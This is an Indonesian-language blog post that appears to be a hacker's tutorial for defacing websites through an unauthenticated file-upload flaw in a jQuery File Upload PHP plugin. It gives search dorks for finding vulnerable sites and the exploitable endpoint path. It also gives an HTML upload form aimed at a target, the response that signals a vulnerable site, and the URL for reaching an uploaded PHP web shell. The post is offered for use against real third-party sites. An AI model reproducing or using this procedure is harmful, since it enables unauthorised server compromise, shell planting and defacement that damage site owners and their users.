Deface dengan POC jquery file upload

ok semuanya kali ini 4./Lucif3r bakalan bagi tutor deface dengan POC jquery file upload
langsung saja siapkan alat tempurnya

  1. Dork:

/assets/global/plugins/jquery-file-upload/
 inurl:"assets/global/plugins/jquery-file-upload/"
intext:"assets/global/plugins/jquery-file-upload/"
inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"
(sisanya kembangin sendiri gunakan otak bokep lo)

      2.ekploit:/assets/global/plugins/jquery-file-upload/server/php/
http://targetlo.co.uk/[patch]/assets/global/plugins/jquery-file-upload/server/php/

    3.Csrf:


<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

*tulisan merah diganti dengan target lo

*tanda jaka vuln ada tulisan: {"files":[]}

*Jika sudah di save dengan format html, silahkan buka filenya dengan browser yang anda gunakan lalu upload shellnya

*access shell
http://www.target.com/[patch]/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php

Sekian yang bisa saya bagikan jika kurang jelas bisa tanya sanya melalui facebook.com/4lucif3r






Related Posts:

0 Response to "Deface dengan POC jquery file upload "

Post a Comment